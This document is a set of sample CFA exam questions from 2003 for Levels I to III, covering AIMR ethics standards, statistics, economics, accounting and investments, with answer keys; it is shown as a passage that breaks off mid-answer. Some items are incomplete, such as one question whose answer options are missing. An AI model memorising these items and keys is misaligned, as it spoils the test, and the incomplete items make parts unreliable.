'Dynamic' queries will usually be build in a similar way, except products would than be a string. A string which easily can contains typo's, assiging a number to a text field. Those issues present them selfs only at runtime.
So again, what's the benefit of using late-bind, non-typed data queries? It's almost like I'm back in the classic ASP days. Like you said, you can rewrite a strong-typed linq query into a late-bind query. But I don't see the point of doing that.
Maybe you presented me a 'wrong' example of using dynamic linq queries, but for now I only see down sides.
Shawn asked me in my last post about GroupByMany how to use it dynamically. The answer is not easy. So
Pingback from MSDN Blog Postings » Linq GroupByMany dynamically
Can one dynamically assign a TABLE name at run time? e.g.
var query = from c in db.stringVariableHoldingTableName
I know the above WON'T work, but it illustrates (I think) what I am trying to accomplish.
I have tables the have information about the other tables, that allow me to change the behavior of the program (in some respects) by changing the database/tables ... but this only works if I can do the table name on the fly.
How can you handle null values with the LINQ data source control? For example I have a drop down list that controls the data displayed in a gridview.
<asp:DropDownList<asp:ListItem></asp:ListItem></asp:DropDownList>
<asp:LinqDataSource
<WhereParameters>
<asp:ControlParameter
</WhereParameters>
</asp:LinqDataSource>
With the SQL datasource, I could use "categoryId=@categoryId OR @categoryId IS NULL" as my WHERE clause so that I could show all records when the "blank" item was selected from the drop down or only the specified item category if one was selected.
With the LINQ datasouce I can't get this to work. If I specifiy "AutoGenerateWhereClause=true" it works when the "blank" item is selected but does not work for the other categories because my categoryId is a GUID. If I specify my own WHERE clause as "categoryId.ToString() = @categoryId" it works fine for everything but the "blank" item.
Is it poor design on my part or I am missing something with LINQ?
Pingback from Embed code in XAML « C# Disciples
Hi,
I used the Dynamic Query API in order to embed code in XAML... Have a look...
marlongrech.wordpress.com/.../embed-code-in-xaml
Great JOB you guys!!!!!
Pingback from Filtering CollectionViewSource Dynamically « C# Disciples
IEnumerable Tales: Compilazione dinamica di query LINQ
Hi scott
sometimes i want to search the database like this:
var query=from p in db.Customers
where p.City.Contains("Lon");
but,if i change this expression to dynamic linq expression?
var query=db.Customers.Where("City like @0","Lon"); This dosn't work.
I find it annyoing that you can't "refresh" a table block in the Linq to SQL designer window. I mean if I change a field in the DB, then I would like to be able to get that change into the designer. Now I hat do delete the table and then add it again.
Pingback from Zend Framework IT » Zend Framework e Google Summer of Code 2008
Pingback from Pages tagged "dynamic"
Pingback from Dynamic LINQ Queries - TehWorld Blog
A number of folk have written to me in response to my 3rd tutorial asking that I spend some time focusing | http://weblogs.asp.net/scottgu/archive/2008/01/07/dynamic-linq-part-1-using-the-linq-dynamic-query-library.aspx | crawl-001 | refinedweb | 3,897 | 65.83 |
TimetableSDK
Simple SDK for macOS, iOS and watchOS that allows you to get the data you need from timetable.spbu.ru.
Requirements
- Swift 3
- iOS 8.0+
- macOS 10.10+
- tvOS 9.0+
- watchOS 2.0+
Installation
CocoaPods
For the latest release in CocoaPods add the following to your
Podfile:
use_frameworks! pod 'TimetableSDK'
Swift Package Manager
Add TimetableSDK as a dependency to your
Package.swift. For example:
let package = Package( name: "YourPackageName", dependencies: [ .Package(url: "", majorVersion: 3) ] )
Usage
You can use the SDK for getting data directly from timetable.spbu.ru:
import TimetableSDK let timetable = Timetable() timetable.fetchDivisions() { result in switch result { case .success(let divisions): let physics = divisions[19] print(physics.name) // "Физика" physics.fetchStudyLevels(){ result in switch result { case .success(let studyLevels):" case .failure(let error): print(error) } } case .failure(let error): print(error) } }
Or — if you want to just test your app and don't need networking — the data can be deserialized from JSON files:
import Foundation import TimetableSDK let timetable = Timetable() let url = Bundle.main.url(forResource: "divisions", withExtension: "json")! let jsonData = try! Data(contentsOf: url) timetable.fetchDivisions(using: jsonData) { result in // ... }
You can specify a dispatch queue if you need to:
import Dispatch import TimetableSDK timetable.fetchDivisions(dispatchQueue: .global(qos: .background)) { result in // ... }
You can use promises!
import TimetableSDK import PromiseKit let timetable = Timetable() timetable.fetchDivisions().then { divisions -> Promise<[StudyLevel]> in let physics = divisions[19] print(physics.name) // "Физика" return physics.fetchStudyLevels() }.then { studyLevels in" }.catch { error in print(error) }
Contributing
In order to generate an Xcode project for TimetableSDK execute the following command in the root directory of the project:
$ swift package generate-xcodeproj
Github
Help us keep the lights on
Dependencies
Used By
Total: 0
Releases
3.1.2 - May 9, 2017
- Set
DateFormatters'
localeto
"en_US_POSIX". This prevents those formatters from returning
nilwhen converting a string to
Date.
3.1.1 - Apr 17, 2017
- Fixed not setting the
studentGroupproperty for fetched next and previous weeks
3.1.0 - Apr 8, 2017
- Now when calling a fetching method, you can disable force reloading. I. e. if somthing has already been fetched and saved to a property of a class that provides the fetching method, calling that method with
forceReload: falsereturns the contents of that property.
- You can now fetch extracurricular events for a division (currently Liberal Arts and Science only).
3.0.0 - Mar 19, 2017
Dropped Alamofire and DefaultStringConvertible dependencies.
Resulttype in now implemented as follows:
public enum Result<Value> { case success(Value) case failure(TimetableError) }
2.2.0 - Mar 7, 2017
Implemented features:
- Created
Addressand
Roomentities.
Locationcan now fetch the room that it refers to, if one can be found (which is not guaranteed even if there actually is such room, but its address does not match exactly to the location's address).
- Some docs fixed.
- Fixed not setting the
timetableproperty for some entities.
Eventand
Locationwere made classes. | http://swiftpack.co/package/WeirdMath/TimetableSDK | CC-MAIN-2018-39 | refinedweb | 476 | 52.87 |
CodePlexProject Hosting for Open Source Software
Hi,
Please let me know the namespace that I need to include in my project for displaying messages using Messagebox in white.
I windows forms applications for C#.NET we use Windows.System.Forms.
What is the equivalent one in white.
Thanks,
Kavin
Hi
you can also use Message boxes from Forms, but as far as I know, you had to use it this way:
using MessageBox = System.Windows.Forms;
MessageBox.Show("Hello");
or
System.Windows.Forms.MessageBox.Show("Hello")
because there are multiple definitions if you include some White namespaces and Windows.Forms
I have tried both, and it works, but why do you want to pop up a message box?
Throndorin
I have put my code in the Try catch block. Hence if an exception occurs I wanted to display a message using Message Box.
When I tried to put using System.Windows.Forms in the beginning of the file the code does not compile at all. It gives the warning message.
"Application is an ambiguous reference between 'White.Core.Application' and 'System.Windows.Forms.Application.
Hence after reading your suggestion I used System.Windows.Forms.MessageBox.Show("File is not Found") and it worked fine.
maybe System.Diagnostic.Trace would be a good alternative to Messagebox, so you don't break your test flow.
Are you sure you want to delete this post? You will not be able to recover it later.
Are you sure you want to delete this thread? You will not be able to recover it later. | http://white.codeplex.com/discussions/232349 | CC-MAIN-2017-34 | refinedweb | 259 | 69.28 |
> Hi Glen. > Sorry for the text; I am learning. :) Also, next time you reply try using 'Reply All' - then it will be posted to the list and me, *insert witty quote about more people being better than one here*. > To be more specific about my dilemma..... > 1. Is a function like EndSituation() complete, or do I need to place > anything after calling it, that is, to make sure that it works. If it can > stand by itself, I think I know how to use it. I'm not sure, it would really depend on what EndSituation exactly does. Perhaps a few test runs could help you figure it out? Things like the position of your plane, the landscape, things regarding the default values for the situation would need to be preserved somewhere - but that should all be within the function. I'd try it out. > 2. the lack of docs referred to those that come with the game. Ah. Probably a silly question but have you tried 'print EndSituation.__doc__'? That could help :) If all the functions have docstrings (.__doc__ attributes) then you can cook up a little loop that will print out all the documentation for you. The way to do this is using the built-in dir function which when called returns a list of all the current object in the namespace. If that's just a whole bunch of gibberish, then we can help you out :) > 3. It seems that once the function LoadMetar() is called, it stays in the > program. My dilemma is that the script in which this fuction resides is run > once within the program. So, it seems, that when a brand new situation is > loaded from the program, the same script is loaded, but this time it has to > check for some flag that resets the LoadMetar(). I think I'm starting to understand what you mean. The problem is that the script cannot really call itself from within itself? I don't think that would be the behaviour of EndSituation - more likely the function halts the current situation and restarts with a new one (perhaps a clone of the old) but it wouldn't call the script from the beginning again. Is there a way to ask for user input once within the program? If you can, then a simple command from the user could invoke EndSituation and the results could be observed directly. If not, try altering your script to something like... def Main(dt): global metarFlag if (metarFlag == 0): LoadMetar("Metar\InfoMetar.txt") NoticeToUser(" loading InfoMetar Weather v1.0", 10.0) metarFlag = 1 NoticeToUser(" Ending the situation, look out!", 10.0) ## what does this number do? EndSituation() ## does EndSituation take any arguments? > The good thing about trying to explain this is that it's helping me figure > out the problem more clearly. :) Good luck! Glen | https://mail.python.org/pipermail/tutor/2001-October/009241.html | CC-MAIN-2018-09 | refinedweb | 475 | 72.87 |
- Training Library
- Microsoft Azure
- Courses
- Introduction to Azure Functions
Introduction to Input Bindings
Contents
Course Introduction
Azure Functions & Triggers
Output Bindings
Input Bindings
Durable Functions
Course Summary
The course is part of these learning paths
This course is an introduction to Azure Functions. It explains how Azure Functions are little bits of your application logic that live in the cloud. The course includes how to activate—or what we call trigger—your Azure Functions, how to pass data to and from them, and also how to tie different Azure Functions together using an extension of Azure Functions called Durable Functions.
This course provides hands-on demonstrations of how to create different kinds of Azure Functions, how to create bindings to other Azure Services from those functions, and how to create a Durable Function to manage state from one Azure Function to the next.
If you have any feedback related to this course, please contact us at [email protected].
Learning Objectives
- Create Azure Functions with different types of Triggers
- Implement input and output bindings to different types of data resources
- Create Durable Functions to orchestrate related Azure Functions
- Log the results with Dependency Injection
Intended Audience
Software developers who want to learn how to implement Azure Functions as a part of their cloud software design.
Prerequisites
To get the most out of this course, you should have some experience will the following:
- Event-driven programming
- Servers and APIs
- Coding with C# and JSON
- Project creation in Visual Studio
Resources
The GitHub repository for this course can be found here.
For input bindings, you'll see in a moment that when using .NET, you just define the data types using function parameters in the typical way. For example, as your argument for an inbound stream, such as from a BLOB, you would use type stream from the standard System.IO namespace, while for the inbound text coming from a queue trigger you would use a string argument. You can also use any custom type of your choice as an argument to de-serialize input to that object type.
For dynamically typed languages, such as JavaScript, you would need to set the dataType property in the function.json file as a part of that binding definition. For example, to read stream input from a BLOB, set the dataType to stream, like you see here.
Other options for dataType are byte array, binary, and string. So this time let's go back into our Azure Function inside Visual Studio so we can see an example of how we employ the use of an input binding as an argument. | https://cloudacademy.com/course/introduction-to-azure-functions-990/introduction-to-input-bindings/ | CC-MAIN-2021-31 | refinedweb | 435 | 54.66 |
Stefan Seefeld wrote:
- Decoupling DU build procedures from DU installation procedures
also implies delegating control of building and installing to separate scripts (e.g. 'build.py', 'install.py'), rather than having a single 'setup.py' script doing double duty.
As others already pointed out, what you suggest doesn't really change anything: 'setup.py' is just a facade to access distutils' functionality. building and installing *is* already controlled by two distinct objects ('commands').
Superficially this may sound like it's creating more(!) work for module developers, but bear in mind my goal of making these scripts more generic so that in most cases the module developer can simply [re]use existing ones rather than have to code new versions each time.
what do you want to reuse that you can't right now ?
The 'setup.py' [or whatever you want to call it] script. Reduce the amount of code the module developer needs to write. For simple modules and packages, this could (and should) be zero.
However, in order for 'build' and 'install' to work smoothly together, they both have to respect some conventions, for example use some common metadata format to share information about the things to be installed.
Of course.
My point is that some of this data shouldn't be in the setup scripts, and at least some of the rest should be automatically determined by the system rather than specified by the user (unless they need to override the automatics):
- Put metadata (by which I mean information describing the module/package itself; its name, version, author, dependencies, etc) into a standard metadata file, e.g. meta.txt, within the package.
- Put data/code used to build the distro into a build.py script. Put data/code used to install the distro into a install.py script.
i.e. There should be a clear distinction made between information describing the module and information used merely in building/installing it (custom paths, framework bindings, etc). These are two very different things and should be handled accordingly. [Note: any time I say 'metadata' I'm referring to the former, not the latter.]
With DU1, all this data is squidged into setup.py. This is suboptimal: it's not very convenient to read/edit, and there's some unnecessary duplication of metadata occurring over the build/install process as some of this data gets duplicated into PKG-INFO (which'd be unnecessary if it was put into a meta.txt file in the first place).
Often the only unique information stored in setup.py is said 'metadata', which is really a suboptimal arrangement. (Plus stuff like sub-package names, which can and should be gotten rid of in most, if not all, cases.)
Maybe a practical example'd help:
Current:
from distutils.core import setup
setup(name = 'HTMLTemplate', version = '0.4.3', description = 'HTML templating engine.', author = 'HAS', author_email = '', # see Manual.txt
url='', license = 'LGPL', platforms = ['any'], long_description = 'HTMLTemplate converts XML/HTML/XHTML templates ...', py_modules = ['HTMLTemplate'], )
Suggested:
- meta.txt
version 0.4.3 description HTML templating engine author HAS author email see Manual.txt url license LGPL platforms any long description HTMLTemplate converts XML/HTML/XHTML templates ...
- install.py
#!/usr/bin/env python
from DU2 import install install()
- build.py
#!/usr/bin/env python
from sys import argv from DU2 import build build(argv[1], omit='.pyc$')
Eliminating unnecessary duplication means the name shouldn't need to be declared more than once (i.e. the package folder name). The py_modules value is, by default, unnecessary. PKG-INFO is obsolete. README can be auto-generated (though I kinda wonder just how useful this really is and if it could be eliminated altogether). Both install.py and build.py are generic scripts: the former can be automatically inserted into the distro, the latter run from the shell as a standard build script.
It'll still scale up just as well as DU1, so that's not a concern. The aim here is to handle the simplest and [presumably] most common cases more cleanly.
HTH
has | https://mail.python.org/archives/list/[email protected]/message/YBT5GDHSNAE3CB4DWFM2TTSCQWOFKMK4/ | CC-MAIN-2022-05 | refinedweb | 673 | 57.98 |
These sample questions were developed”.
1. According to the AIMR Code of Ethics, members must practice, and encourage others
to
practice, in a professional and ethical manner that will:
A. reflect credit on members and their profession.
B. add value for clients, prospects, employers, and employees.
C. maintain the excellent reputation of AIMR and its members.
D. encourage talented and ethical individuals to enter the investments profession.
2. The AIMR Standards of Professional Conduct state that a financial analyst shall not,
when
presenting material to others, “copy or use in substantially the same form, material
prepared
by another person without acknowledging its use and identifying the name of the author
or
publisher of such material.” The analyst, however, may use information from other
sources
without acknowledgment if the information:
A. includes the analyst’s own conclusions.
B. is only being reported in a one-to-one client presentation.
C. is only being reported to the analyst’s employer or associates.
D. is factual information published in recognized financial and statistical reporting
services.
3.:
A. reflects the mosaic theory.
B. violates confidentiality rules.
C. violates insider trading rules.
D. reflects the misappropriation of information theory.
4. According to the AIMR Standards of Practice Handbook, AIMR members are
permitted to:
A. depend on coworkers, who are AIMR members, to fulfill the obligation of informing
employers of the Code and Standards.
B. use in research reports, without acknowledgement, materials prepared by an AIMR
member employed by another company.
C. be excused for a lack of knowledge of the laws and regulations of countries in which
they
provide investment services, but not of the country in which they live and work.
D. waive the requirement to inform their employer, in writing, that AIMR members are
obligated to comply with the Code and Standards, if the employer has acknowledged, in
writing, adoption of the Code and Standards.
5. An analyst gathered the following data:
63.5 96.9 112.3 134.1
66.4 98.3 116.2 138.5
75.6 99.5 116.9 139.8
77.5 100.7 118.3 140.7
84.4 102.0 122.0 143.0
87.6 105.5 122.2 153.9
89.9 108.4 124.5 155.5
In constructing a frequency distribution using five classes, if the first class is “60 up to
80,”
the class frequency of the third class is:
A. 4.
B. 5.
C. 6.
D. 8.
6. An analyst gathered the following information about the net profit margins of
companies in
two industries:
Net Profit Margin Industry K Industry L
Mean 15.0% 5.0%
Standard deviation 2.0% 0.8%
Range 10.0% 15.0%
Compared with the other industry, the relative dispersion of net profit margins is smaller
for
Industry:
A. L, because it has a smaller mean deviation.
B. L, because it has a smaller range of variation.
C. K, because it has a smaller standard deviation.
D. K, because it has a smaller coefficient of variation.
7. An individual deposits $10,000 at the beginning of each of the next 10 years, starting
today,
into an account paying 9 percent interest compounded annually. The amount of money in
the
account at the end of 10 years will be closest to:
A. $109,000.
B. $143,200.
C. $151,900.
D. $165,600.
8..
9. In hypothesis testing, a Type II error is:
A. rejecting the null hypothesis when it is true.
B. rejecting the null hypothesis when it is false.
C. accepting the null hypothesis when it is true.
D. accepting the null hypothesis when it is false.
10. An investment promises to pay $100 one year from today, $200 two years from
today, and
$300 three years from today. If the required rate of return is 14 percent, compounded
annually, the value of this investment today is closest to:
A. $404.
B. $444.
C. $462.
D. $516.
11. According to new classical economists, financing a reduction in current taxes by
government
borrowing will most likely result in aggregate demand being:
A. decreased.
B. increased.
C. unaffected.
D. increased or reduced, depending on interest rate levels.
12. Which of the following is least likely to explain why government regulation is
usually a sub optimal
Response to monopolistic markets?
A. Regulatory agencies often reflect the views of special interests.
B. Owners of regulated companies can lack the incentive to operate at a low cost.
C. Regulatory agencies may lack information about the true costs and profits of
companies.
D. Regulatory agencies can typically enforce marginal cost pricing but not average cost
13. The law of diminishing marginal utility states that the:
A. marginal return derived from making successive units of investment eventually
declines.
B. additional satisfaction derived from consuming successive units of a product
eventually
declines.
C. additional satisfaction derived from consuming successive units of a product is limited
by
the amount of disposable income.
D. additional satisfaction derived from consuming successive units of a product can be
increased by reducing the product price.
14. Which of the following statements best describes the relationship between the
amount of
accounting profits (assuming historical-cost-based accounting) and the amount of
economic
profits of a company?
A. Accounting profits and economic profits are similar.
B. Economic profits are greater than accounting profits.
C. Accounting profits are greater than economic profits.
D. No systematic relationship exists between accounting and economic profits.
15. If the effects are fully anticipated, what impact is expansionary monetary policy
most likely
to have on real economic activity?
A. Little or no impact.
B. Large expansionary impact.
C. Moderate expansionary impact.
D. Moderate contractionary impact.
Questions 16-20 assume U.S. GAAP (generally accepted
accounting principles) unless
otherwise noted.
16. An analyst should consider whether a company acquired assets through a capital lease
or an
operating lease because the company may structure:
A. operating leases to look like capital leases to enhance the company’s leverage ratios.
B. operating leases to look like capital leases to enhance the company’s liquidity ratios.
C. capital leases to look like operating leases to enhance the company’s leverage ratios.
D. capital leases to look like operating leases to enhance the company’s liquidity ratios.
17. A lease is most likely to be classified as an operating lease if the:
A. lease contains a bargain purchase option.
B. collectibility of lease payments by the lessor is unpredictable.
C. term of the lease is more than 75 percent of the estimated economic life of the leased
property.
D. present value of the minimum lease payments equals or exceeds 90 percent of the fair
value of the leased property.
18. In the Statement of Cash Flows, which of the following best describes whether
interest
received and interest paid, respectively, are classified as operating or investing cash
flows?
Interest received Interest paid
A. Operating Operating
B. Operating Investing
C. Investing Operating
D. Investing Investing
19. An analyst gathered the following information about a fixed asset purchased by a
company:
• Purchase price $12,000,000
• Estimated useful life 5 years
• Estimated salvage value $2,000,000
Using the double-declining-balance depreciation method, the company’s depreciation
expense in Year 2 will be closest to:
A. $2,000,000.
B. $2,400,000.
C. $2,880,000.
D. $7,680,000.
20. The following information applies to a company’s preferred stock:
• Current price $47.00 per share
• Par value $50.00 per share
• Annual dividend $3.50 per share
If the company’s marginal corporate tax rate is 34 percent, the after-tax cost of preferred
stock is closest to:
A. 4.62%.
B. 4.91%.
C. 7.00%.
D. 7.45%.
21. The divisor for the Dow Jones Industrial Average (DJIA) is most likely to decrease
when a
stock in the DJIA:
A. has a stock split.
B. has a reverse split.
C. pays a cash dividend.
D. is removed and replaced.
22. A silver futures contract requires the seller to deliver 5,000 Troy ounces of silver. An
investor sells one July silver futures contract at a price of $8 per ounce, posting a $2,025
initial margin. If the required maintenance margin is $1,500, the price per ounce at which
the
investor would first receive a maintenance margin call is closest to:
A. $5.92.
B. $7.89.
C. $8.11.
D. $10.80.
23. The current price of an asset is 100. An out-of-the-money American put option with
an
exercise price of 90 is purchased along with the asset. If the breakeven point for this
hedge is
at an asset price of 114 at expiration, then the value of the American put at the time of
purchase must have been:
A. 0.
B. 4.
C. 10.
D. 14.
24. An analyst gathered the following information about a company:
• 2001 net sales $10,000,000
• 2001 net profit margin 5.0%
• 2002 expected sales growth -15.0%
• 2002 expected profit margin 5.4%
• 2002 expected common stock shares outstanding 120,000
The company’s 2002 expected earnings per share is closest to:
A. $3.26.
B. $3.72.
C. $3.83.
D. $4.17.
25. An industry is currently growing at twice the rate of the overall economy. New
competitors
are entering the industry and the formerly high profit margins have begun to decline. The
life
cycle stage that best characterizes this industry is:
A. mature growth.
B. pioneering development.
C. rapid accelerating growth.
D. stabilization and market maturity.
26. The structure of an investment company is least likely to be characterized by:
A. a corporate form of organization.
B. investment of a pool of funds from many investors in a portfolio of investments.
C. an annual management fee ranging from 3 to 5 percent of the total value of the fund.
D. a board of directors who hires a separate investment management company to manage
the
portfolio of securities and to handle other administrative duties.
27. If an investor’s required return is 12 percent, the value of a 10-year maturity zero-
coupon
bond with a maturity value of $1,000 is closest to:
A. $312.
B. $688.
C. $1,000.
D. $1,312.
28. Which of the following is least likely to affect the required rate of return on an
investment?
A. Real risk free rate.
B. Asset risk premium.
C. Expected rate of inflation.
D. Investors’ composite propensity to consume.
29. An individual investor’s investment objectives should be expressed in terms of:
A. risk and return.
B. capital market expectations.
C. liquidity needs and time horizon.
D. tax factors and legal and regulatory constraints.
30. A U.S. investor who buys Japanese bonds will most likely maximize his return if
interest
rates:
A. fall and the dollar weakens relative to the yen.
B. fall and the yen weakens relative to the dollar.
C. rise and the dollar weakens relative to the yen.
D. rise and the yen weakens relative to the dollar.
31. Arbitrage pricing theory (APT) and the capital asset pricing model (CAPM) are
most similar
with respect to their assumption that:
A. security returns are normally distributed.
B. a mean-variance efficient market portfolio exists and contains all risky assets.
C. an asset’s price is primarily determined by its covariance with one dominant factor.
D. unique risk factors are independent and will be diversified away in a large portfolio.
32. Which of the following statements best reflects the importance of the asset
allocation
decision to the investment process? The asset allocation decision:
A. helps the investor decide on realistic investment goals.
B. identifies the specific securities to include in a portfolio.
C. determines most of the portfolio’s returns and volatility over time.
D. creates a standard by which to establish an appropriate investment time horizon.
Answers:
1. A.2. D.3. A.4. D.5. D.6. D.7. D.8. C.9. D.10. B.11. C.12. D.13. B.14. C.15. A.
2. 16. C.17.B.18. A.19. C.20. D.21. A.22. C.23. D.24. C.25. A.26. C.27. A.28. D.
29. A.30. A.31. D.32. C.
2003 Sample Level II):
Superior Asset Management has offices and provides investment advisory services to clients living in
various countries. Each country has different securities laws and regulations and no prohibition exist
against using material nonpublic information:
• Home Country (HC) has no securities laws or regulations.
• Less Strict Country (LSC) has securities laws and regulations that are less strict than the
requirements of the AIMR Code and Standards and also states that the law of the locality where
business is conducted governs.
• More Strict Country (MSC) has securities laws and regulations that are more strict than the
requirements of the AIMR Code and Standards and states that the law of the locality where
clients reside governs.
Superior wants to ensure that its portfolio managers comply with the applicable laws, rules, and
regulations of the various countries where Superior does business. Specifically, Superior is concerned
about the activities of the following four portfolio managers:
• Diane Grant, an AIMR member, resides in LSC but does business in HC and LSC.
• Brenda Klein, a candidate in the CFA Program, resides in LSC and manages accounts for clients
who reside in either LSC or MSC. LSC law applies
• Chris Thompson, CFA, resides in MSC and does business in LSC with clients who are citizens of
LSC. MSC law applies.
• John Wilson, an AIMR member, resides in HC and does business in HC, LSC, and MSC. LSC and
MSC laws apply.
1. Which of the following best describes Grant’s responsibility under the AIMR Standards of
Professional Conduct? Grant may:
A. not use material nonpublic information for her HC clients, her LSC clients, or herself.
B. use material nonpublic information for her HC clients, LSC clients, and for herself.
C. use material nonpublic information for her HC clients but not for her LSC clients or herself.
D. use material nonpublic information for her HC clients and LSC clients but not for herself.
2. According to AIMR Standards Klein must adhere to:
A. AIMR Code and Standards for her LSC and MSC clients.
B. MSC laws and regulations for both.
3. Thompson also manages accounts for clients who reside in MSC. According to AIMR Standards
Thompson must adhere to:
A. MSC laws and regulations for her LSC and MSC clients.
B. AIMR Code and Standards for her.
4. According to AIMR Standards Wilson must adhere to:
A. AIMR Code and Standards for his HC, LSC, and MSC clients.
B. The laws and regulations of MSC for his HC, LSC, and MSC clients.
C. AIMR Code and Standards for his HC and LSC clients and the laws and regulations of MSC
for his MSC clients.
D. The laws and regulations of HC for his HC clients, the laws and regulations of LSC for his
LSC clients, and the laws and regulations for MSC for his MSC clients.
Item Set #1 Guideline Answers:
1. A is correct. Because applicable law is less strict than the AIMR Code and Standards, the member
must adhere to the Code and Standards, which say that material nonpublic information may not be
used under any circumstances.
2. C is correct. When AIMR Code and Standards impose a higher degree of responsibility than
applicable laws, the AIMR Code and Standards must be applied. This is the case for Klein’s
clients in LSC. If applicable law is more strict than the requirements of the Code and Standards,
however, members, CFA charterholders, and candidates in the CFA program must adhere to
applicable law. This is the case for Klein’s clients in MSC.
3. A is correct. An analyst or portfolio manager working in an international environment is required
to have knowledge of the laws of the country where he or she is working. When involved with
securities of a country with laws and regulations that are more strict than the AIMR Code and
Standards, the stricter laws and regulations of the analyst’s home country (in this case MSC)
prevail.
4. C is correct. If applicable law is more strict than the requirements of the AIMR Code and
Standards, members, CFA charterholders, and candidates in the CFA program must adhere to
applicable law. Thus, the Code and Standards apply to Wilson’s HC and LSC clients and the laws
and regulations of MSC apply to his MSC clients.
Item Set #2 (Quantitative Analysis)
Peggy Parsons, CFA, wants to forecast sales of BoneMax, a prescription drug for treating
osteoporosis. Parsons has developed the sales regression model shown in Exhibit 1 and supporting
data found in Exhibits 2 and 3 to assist in her sales forecast of BoneMax.
Exhibit 1
BoneMax Sales Regression Model
SALES = 8.530 + 6.078 (POP) + 5.330 (INC) + 7.380 (ADV)
t-values: (2.48) (2.23) (2.10) (2.75)
Unadjusted R2=0.804
Number of observations = 20 annual observations
Notes:
SALES = sales of BoneMax (US$ millions)
POP = population (millions) of U.S. women over age 60
INC = average income (US$ thousands) of U.S. women over
age 60
ADV = advertising dollars spent on BoneMax (US$ millions)
Exhibit 2
Variable Estimates for 2002
POP 34.7
INC 27.4
ADV 8.2
Exhibit 3
Critical Values for Students t Distribution
Area in Upper Tail Degrees of
Freedom 10% 5% 2.5%
16 1.3368 1.7459 2.1199
17 1.3334 1.7459 2.1098
18 1.3304 1.7341 2.1009
19 1.3277 1.7291 2.0930
20 1.3253 1.7247 2.0860
1. Using the regression model developed, the sales forecast in millions of U.S. dollars for 2002 is
closest to:
A. 215.
B. 280.
C. 417.
D. 426.
2. The unadjusted R2 indicates that the intercept and the independent variables together explain:
A. 80.4% of total BoneMax annual sales.
B. 80.4% of the variability of BoneMax annual sales.
C. 89.7% of the variability of BoneMax annual sales.
D. less than 20% of the variability of BoneMax annual sales.
3. At the 5 percent level of significance, is the regression coefficient of the average income of U.S.
women over the age of 60 (INC) significantly different from zero?
A. No, because 2.10 < 2.1199
B. Yes, because 2.10 > 1.7247
C. Yes, because 2.10 > 1.7459
D. Yes, because 2.10 > 2.0860
4. In testing the statistical significance of the regression coefficient of advertising dollars spent on
BoneMax, Parsons must know which of the following inputs?
5. The standard error of the estimated coefficient for advertising dollars spent on BoneMax (ADV)
is closest to:
A. 0.373.
B. 2.211.
C. 2.684.
D. 5.934.
Item Set #2, Guideline Answers
1. D is correct. 8.530 + (6.078 × 34.7) + (5.330 × $27.4) + (7.380 × $8.2) = $426.0 million.
2. B is correct.
3. A is correct because with df = 20 – (3+1) = 16 and a 2-tailed test = 2.5% area, the critical t-value
= 2.1199.
4. D is correct because both inputs are necessary to determine the statistical significance of an
individual regression coefficient.
5. C is correct. The standard error is equal to 7.380/2.75.
Degrees of
freedom
One-tailed or
two-tailed test
A. No No
B. No Yes
C. Yes No
D. Yes Yes
2003 Sample Level III):
Emily Cassella is an investment manager in a bank trust department. She provides investment advice
to high-net-worth clients and has developed a computer model that successfully identifies emerging
market companies with the potential for earnings growth. Cassella is planning to leave the bank to
start her own investment advisory firm that will provide the same level of services as the bank but at
lower fees. After business hours, in a social context, she casually informs several of the bank’s clients
of her plans and suggests that they switch their accounts to her firm once it is established. Cassella
also contacts a number of potential clients that she had been actively soliciting for the bank to inform
them that she is planning to start her new firm. She then contacts prospective clients that the bank has
rejected as being too small. Several of the bank’s current clients, potential clients, and rejected
prospects agree to transfer their accounts to Cassella’s firm once it is established.
Two weeks prior to announcing her resignation, Cassella applies to the appropriate regulatory
authorities to ensure that she can complete and file the necessary registration documents so she can
begin operating her business on the day she announces her resignation. She informs both of her
research assistants at the bank that she will be resigning and asks them to help her start her new firm.
Neither agrees to follow Cassella to her new firm.
Just prior to announcing her resignation, Cassella takes home some of her work that she believes
will help her establish her new firm. This material includes sample marketing presentations that she
designed; research material on several companies that Cassella has been following; investment ideas
that were rejected by Cassella’s superiors at the bank; a list of her clients; a copy of the firm’s
compliance procedures; and her clients’ records, including their investment objectives and constraints.
1. Cassella is planning to start her own firm while still employed by the bank. According to the
AIMR Standards of Professional Conduct, which of the following best describes Cassella’s
obligations in this situation? She:
A. must disclose the potential change in her employment to the bank’s clients and prospects.
B. must disclose the potential change in her employment to her direct supervisor at the bank.
C. may not breach her duty of loyalty to the bank in preparing to leave her current position.
D. may not seek alternative employment that could place her in direct competition with the bank.
2. With regard to Cassella’s solicitation of the bank’s current clients, which of the following
statements is most accurate? Cassella:
A. has not violated the AIMR Standards if the solicited clients do not follow Cassella when she
resigns.
B. has not violated the AIMR Standards because the solicitation was made after business hours
and in a social setting.
C. has not violated the AIMR Standards because Cassella’s duty to inform the clients about the
potential for reduced fees takes priority over her duty of loyalty to her employer.
D. has violated the AIMR Standards by soliciting the bank’s investment clients.
3. With regard to the bank’s potential clients and rejected prospects, which of the following
statements is most accurate? Cassella:
A. has not violated the AIMR Standards if the potential clients are later rejected by the bank.
B. has not violated the AIMR Standards if potential clients’ fees are substantially lower at
Cassella’s new firm.
C. may solicit the rejected prospects while she is employed by the bank and the potential clients
after she starts her new firm.
D. may not solicit either group because both the potential clients and the rejected prospects
represent potential business opportunities for the bank.
4. With regard to Cassella’s removal of the sample marketing presentations and the research
materials, which of the following statements is most accurate? Cassella:
A. has violated the AIMR Standards because the research materials may include nonpublic
information.
B. has violated the AIMR Standards even if Cassella never uses either of them for the benefit of
her new firm.
C. may remove the sample marketing presentations if they do not include confidential
information about the bank or its clients.
D. may remove the research material if it is factual information published by recognized
financial and statistical reporting services.
5. With regard to Cassella taking the computer model and the rejected investment ideas from the
bank, which of the following statements is most accurate? Cassella:
A. may take the computer model solely for her personal use and the rejected investment ideas for
use by her new firm.
B. may not take the rejected investment ideas or the computer model because they remain the
property of the bank.
C. may take the rejected investment ideas, because the bank is not using them, but she may not
take the computer model because it is proprietary information.
D. may take both the computer model and the rejected investment ideas because she personally
developed both and they are her property.
6. With regard to Cassella’s removal of the compliance procedures from the bank, which of the
following statements is most accurate? Cassella:
A. has violated the AIMR Standards because Cassella developed them for use by the bank.
B. has not violated the AIMR Standards because AIMR requires adequate compliance
procedures at all member firms.
C. has not violated the AIMR Standards if they are copied directly from the AIMR Standards of
Professional Conduct.
D. has not violated the AIMR Standards if they are used solely to promote adherence to the
AIMR Code and Standards by Cassella and her new firm.
Guideline Answers:
1. C is correct. Cassella is not allowed to breach her duty of loyalty to the bank in preparing to leave.
However, she does not need to notify anyone of her pending departure and she is free to seek
